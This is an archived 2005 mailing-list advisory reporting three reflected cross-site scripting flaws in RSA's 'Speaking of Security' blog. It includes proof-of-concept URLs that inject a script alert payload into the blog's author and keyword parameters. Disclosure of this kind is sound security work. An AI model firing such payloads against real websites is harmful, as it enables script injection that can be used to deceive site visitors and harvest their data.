lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050814220217.BB18FFEB5@rgsc.cl>
Date: Sun Aug 14 23:01:25 2005
From: rodrigo at rgsc.cl (Rodrigo Gutierrez)
Subject: RSA XSS Vulnerabilities


RSA XSS Vulnerabilities
 

Author: Rodrigo Gutierrez <rodrigo@...c.cl>

Affected: RSA "Speaking of Security" Blog

Status: Notified Hereby

Vendor url: http://www.rsasecurity.com


Background.

RSA secures more than 15 million user identities, safeguards trillions of
business transactions annually and manages the confidentiality of data in
tens of thousands of applications worldwide. 3 cross site scripting
vulnerabilities has been discovered in their Blog "Speaking of Security" ;)
.


Impact
 
An attacker could gather data from the blog's users by fooling them, to
access the modified vulnerable application.


Proof of Concept

http://www.rsasecurity.com/blog/index.asp?author=%22%3E%3Cscript%3Ealert('XS
S');%3C/script%3E
http://www.rsasecurity.com/blog/index.asp?keyword=%22%3E%3Cscript%3Ealert('X
SS');%3C/script%3E
http://www.rsasecurity.com/blog/bio.asp?author=%22%3E%3Cscript%3Ealert('XSS'
);%3C/script%3E

Just for the picture ;)
http://www.rsasecurity.com/blog/index.asp?author=%52%6f%64%72%69%67%6f%20%47
%75%74%69%65%72%72%65%7a
http://www.rsasecurity.com/blog/index.asp?keyword=%52%6f%64%72%69%67%6f%20%4
7%75%74%69%65%72%72%65%7a


Speaking of Security

RSA should spend some of those $307.5 million they earned in 2004 to audit
their web applications.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ